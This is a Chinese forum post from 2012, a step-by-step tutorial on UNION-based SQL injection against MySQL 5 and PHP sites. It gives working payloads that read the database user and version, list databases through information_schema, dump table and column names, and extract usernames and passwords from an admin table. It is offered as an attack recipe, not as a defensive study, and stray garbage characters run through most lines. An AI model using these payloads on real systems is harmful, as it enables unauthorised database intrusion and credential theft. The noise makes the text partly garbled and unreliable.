2 @, @7 d F1 Q8 P' s% B教程内容:Mysql 5+php 注入. c" T b- \7 g4 z6 a
( b' V+ q# l' x
- s; {2 g# ~: n9 {, u' n$ W3 K% m% e+ N8 V* m6 Q+ N9 ~
一.查看MYSQL基本信息(库名,版本,用户)( q- S; K3 i5 ]
: T/ _0 _- T" H3 [' f
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*( {# v; u, H3 A- \& M! N
6 D) S- {& a8 Q8 I1 u
二.查数据库
) H; E; s5 y& j9 ]1 x
2 E! j8 k5 J" t c& Hand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*0 E8 t; W+ w. U1 L# Z! t6 A( I# D" ~
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。( J+ f% C& \# {" {+ I( E8 H% {9 ^
7 |& p$ c6 J5 Z* i三.暴表
' C' K2 N8 a5 Y+ w! o- b' @# _7 G J8 E' u, V; w- J( w
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*1 ~8 [ W( |' X' \* v! }( p
, b- m/ K) i: ] ^( M( J( O: ]# p; p olimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。7 j- A, a0 j# O2 {2 }( `) `! W
o, t+ {, W; i5 z四.暴字段
8 Q/ Y h. c: ]5 G u* l; w4 C, Z8 R0 U- S
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*. i a( a* X+ t% E( g
. V: w2 i- d$ A; h2 q: K( V3 Wlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
: |, B" I$ t; @7 ~% I
0 k+ w! U( c3 V- h. M五.暴数据) n. n: i8 a) [! y5 x7 P
! } J5 I/ J! u2 p4 B: P# B7 iand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*4 q1 _! q3 C& ?* l) f8 U: Y
. L9 r* M" p6 R, V
: ^6 `! k' r2 y! N0 {
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
0 ^, B. F6 l- @$ R |
发表于 2012-9-13 16:27:53
收藏
分享
支持
反对